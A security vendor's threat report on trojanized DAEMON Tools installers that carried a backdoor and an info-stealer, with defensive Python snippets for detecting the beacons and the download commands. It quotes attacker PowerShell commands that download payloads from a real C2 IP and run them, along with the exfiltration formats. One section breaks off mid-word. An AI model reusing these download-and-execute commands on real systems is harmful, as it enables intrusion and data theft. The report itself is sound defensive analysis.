Supply Chain, May 5, 2026

Popular DAEMON Tools software compromised

DAEMON Tools installers compromised with trojanized binaries deploying backdoors and info-stealers.

Summary

Between April 8 and early May 2026, attackers compromised legitimate DAEMON Tools installers (versions 12.5.0.2421 to 12.5.0.2434) distributed from the official website, injecting malicious payloads into signed system binaries. The supply chain attack affected 100+ countries with targeted secondary payload deployment to retail, scientific, government, and manufacturing organizations; artifacts suggest Chinese-speaking threat actors. The compromised binaries beacon to a typosquatted C2 domain, downloading info-stealers and backdoors that exfiltrate system configuration, process lists, and software inventory.

Full text

UPD 5/5/26: added detection rules and examples by KEDR Expert, and verified detection of the malicious activity using our Kaspersky Managed Detection and Response service.

What happened?

In early May 2026, we identified installers of the DAEMON Tools software, used for mounting disk images, to be compromised with a malicious payload. These installers are distributed from the legitimate website of DAEMON Tools and are signed with digital certificates belonging to the DAEMON Tools developers. Our analysis revealed that the software installers have been trojanized starting from April 8, 2026. Specifically, we identified versions of DAEMON Tools ranging from 12.5.0.2421 to 12.5.0.2434 to be compromised. At the time of writing this article, the supply chain attack is still active.

Artifacts suggesting that the threat actor behind this attack is Chinese-speaking have been identified in the malicious implants observed. We contacted AVB Disc Soft, the developer of DAEMON Tools, so that further actions could be taken to remediate the consequences of the attack.

Starting from early April, we observed several thousand infection attempts involving DAEMON Tools in our telemetry, with individuals and organizations in more than 100 countries being affected. However, out of all the infected machines, we observed further-stage payloads being deployed to only a dozen of them. These machines belonged to retail, scientific, government and manufacturing organizations, which indicates that the supply chain attack is targeted in nature. Kaspersky solutions protect users from the malicious payloads deployed through the DAEMON Tools supply chain attack.
Trojanized binaries

Our analysis revealed that for DAEMON Tools versions from 12.5.0.2421 to 12.5.0.2434, attackers managed to compromise the following binaries inside the software installations:

  • DTHelper.exe
  • DiscSoftBusServiceLite.exe
  • DTShellHlp.exe

These files are located in the directory where DAEMON Tools is installed, for example C:\Program Files\DAEMON Tools Lite. Notably, these files are digitally signed by the developer of DAEMON Tools, AVB Disc Soft. Whenever one of these binaries is launched, which happens at machine startup, a backdoor is activated. This backdoor is implanted in the startup code responsible for initializing the CRT environment. The backdoor runs in a dedicated thread, which sends GET requests to the following URL:

  https://env-check.daemontools[.]cc/2032716822411?s=<full computer name>

The server used for communications is malicious, and its address is designed to typosquat the legitimate daemon-tools[.]cc domain name used for downloading DAEMON Tools. Notably, according to WHOIS, the domain name of the malicious server was registered on March 27, about a week before the start of the supply chain attack.

[Figure: snippet of the decompiled code responsible for forming the GET request URL string in a loop]

In response to the requests sent, the server may return a shell command to be executed through the cmd.exe process.
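As an added example (not code from the report), the following Python triage helper checks whether an installed build falls in the affected 12.5.0.2421 to 12.5.0.2434 range and flags beacons to the typosquatted C2 in proxy logs; the log lines, the log format and the computer names are constructed.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Affected DAEMON Tools build range and the three implanted binaries named in the report.
AFFECTED_MIN = (12, 5, 0, 2421)
AFFECTED_MAX = (12, 5, 0, 2434)
IMPLANTED_BINARIES = {"dthelper.exe", "discsoftbusservicelite.exe", "dtshellhlp.exe"}
# Typosquat of the legitimate daemon-tools.cc, and the beacon path from the report.
BEACON_HOST = "env-check.daemontools.cc"
BEACON_PATH = "/2032716822411"

def version_affected(version: str) -> bool:
    """True if a four-part DAEMON Tools version string is in the compromised range."""
    parts = tuple(int(p) for p in version.strip().split("."))
    if len(parts) != 4:
        raise ValueError(f"unexpected version format: {version!r}")
    return AFFECTED_MIN <= parts <= AFFECTED_MAX

def classify_request(process: str, url: str) -> Optional[dict]:
    """Flag a request to the C2 beacon URL; its 's' parameter carries the
    victim's full computer name. Returns None for any other traffic."""
    u = urlsplit(url)
    if u.hostname != BEACON_HOST or u.path != BEACON_PATH:
        return None
    return {
        "process": process,
        "computer_name": parse_qs(u.query).get("s", [None])[0],
        # A beacon from any process is a hit; one coming from one of the three
        # signed binaries matches the report's description exactly.
        "from_implanted_binary": process.lower() in IMPLANTED_BINARIES,
    }

# Constructed proxy log lines (not from the report): "<process> <method> <url>".
SAMPLE_LOG = """\
DTHelper.exe GET https://env-check.daemontools.cc/2032716822411?s=WS-0042.corp.example
chrome.exe GET https://www.daemon-tools.cc/downloads
DTShellHlp.exe GET https://env-check.daemontools.cc/2032716822411?s=LAPTOP-17
"""

def scan_log(text: str) -> list:
    """Return one hit per log line whose URL is the beacon URL."""
    hits = []
    for line in text.splitlines():
        fields = line.split(" ", 2)
        if len(fields) != 3:
            continue
        hit = classify_request(fields[0], fields[2])
        if hit:
            hits.append(hit)
    return hits
```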
We observed this shell command to have the following template:

  cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/<hexadecimal string>','C:\Windows\Temp\<filename>.exe')"&& %TEMP%\<filename> <arguments> &&del %TEMP%\<filename>.exe"

As can be observed from the template, these shell commands are used for downloading and launching an executable payload. We have seen multiple types of these payloads, which we describe below.

Information collector

The first payload we observed being deployed by the attackers is an information collector. It was deployed through the following command:

  cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe

The envchk.exe file (SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4) is a .NET executable used for collecting extended system information. Notably, its code includes strings in Chinese. While this may imply that a Chinese-speaking actor is behind this attack, we do not currently attribute the DAEMON Tools compromise to any particular actor.
[Figure: screenshot of the information collector code, with strings in Chinese]

The data collected by the information collector includes:

  • MAC address (the first non-zero one);
  • hostname;
  • DNS domain name;
  • list of running processes, separated by semicolons;
  • list of installed software, separated by semicolons;
  • system locale.

This information is sent to the C2 server specified in the command line argument of the information collector. As can be observed from the command above, the address of the server is http://38.180.107[.]76/09505aca4f538bd. The data is relayed in the body of a POST request in the following form:

  a=<MAC address>&b=<hostname>&c=<DNS domain name>&d=<process list>&e=<software list>&f=<locale>

Minimalistic backdoor

While we observed attempts to deploy the information collector on a large number of infected machines, we also noted that the attackers attempted to deliver another payload to a very small number of machines, about a dozen. Based on this, we conclude with a high degree of confidence that the information collector is used for profiling the infected machines, with the profiling results then used to deploy additional payloads in a targeted manner. One such payload we observed is a minimalistic backdoor.
We observed it being deployed with the following command:

  cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp"

As can be observed, this command downloads two files, cdg.exe and cdg.tmp. The cdg.exe file, which is then launched, is a shellcode loader: it opens the cdg.tmp file, decrypts it with RC4 (with the key specified in the final argument, first_match in the case above), and runs it as shellcode.

[Figure: cdg.exe shellcode loader usage]

This shellcode is the backdoor body. The backdoor itself sends POST request heartbeats to the following URL:

  http://38.180.107[.]76/79437f5edda13f9c066/version/check

Its features include abil
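As an added example (not code from the report), the following Python parser recognises the download-and-run template described above in process-creation command lines and extracts the download URLs, dropped paths and executed command, so that EDR or Sysmon events can be triaged. It is run over the two commands quoted in this article plus one constructed benign line; the field names and the benign line are assumptions of the example.

```python
import re
from typing import Optional

# Stage 1 of the template: the PowerShell WebClient download of the payload.
DOWNLOAD_RE = re.compile(
    r"\$wc=New-Object System\.Net\.WebClient;"
    r"\$wc\.DownloadFile\('(?P<url>[^']+)','(?P<path>[^']+)'\)",
    re.IGNORECASE,
)
# Stage 2: "&&<dropped .exe> <arguments>&&del ..." runs, then removes, the payload.
EXEC_RE = re.compile(
    r"&&\s*(?P<exe>(?:%TEMP%|C:\\Windows\\Temp)\\[\w.-]+\.exe)(?P<args>[^&]*)&&\s*del\s",
    re.IGNORECASE,
)

def parse_cradle(cmdline: str) -> Optional[dict]:
    """Parse a command line that follows the report's download-and-run template.
    Returns the downloads, the executed file and its arguments, or None when the
    line does not match (ordinary cmd/powershell use is ignored)."""
    if not re.match(r"\s*cmd\.exe\s+/c\s+powershell\b", cmdline, re.IGNORECASE):
        return None
    downloads = [(m.group("url"), m.group("path")) for m in DOWNLOAD_RE.finditer(cmdline)]
    if not downloads:
        return None
    run = EXEC_RE.search(cmdline)
    return {
        "downloads": downloads,  # [(url, dropped path), ...]
        "executed": run.group("exe") if run else None,
        "args": run.group("args").split() if run else [],
        "cleans_up": bool(re.search(r"&&\s*del\s", cmdline, re.IGNORECASE)),
    }

# The two commands quoted in the report, and one constructed benign line for comparison.
INFO_COLLECTOR_CMD = r'''cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe'''
BACKDOOR_CMD = r'''cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp"'''
BENIGN_CMD = r'''cmd.exe /c powershell -NoProfile -Command "Get-Process | Out-File C:\Temp\procs.txt"'''

if __name__ == "__main__":
    for cmd in (INFO_COLLECTOR_CMD, BACKDOOR_CMD, BENIGN_CMD):
        print(parse_cradle(cmd))
```

The `args` of a match are worth keeping in the alert: for the backdoor command they carry the RC4 key and the encrypted shellcode path, which an analyst needs to decrypt the captured cdg.tmp.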

Indicators of Compromise

  • domain — env-check.daemontools.cc
  • ip — 38.180.107.76
  • hash_sha1 — 2d4eb55b01f59c62c6de9aacba9b47267d398fe4
  • url — https://env-check.daemontools.cc/2032716822411
  • url — http://38.180.107.76/env_check_script

Entities

  • DAEMON Tools Lite (product)
  • AVB Disc Soft (vendor)
  • Digital code signing certificates (technology)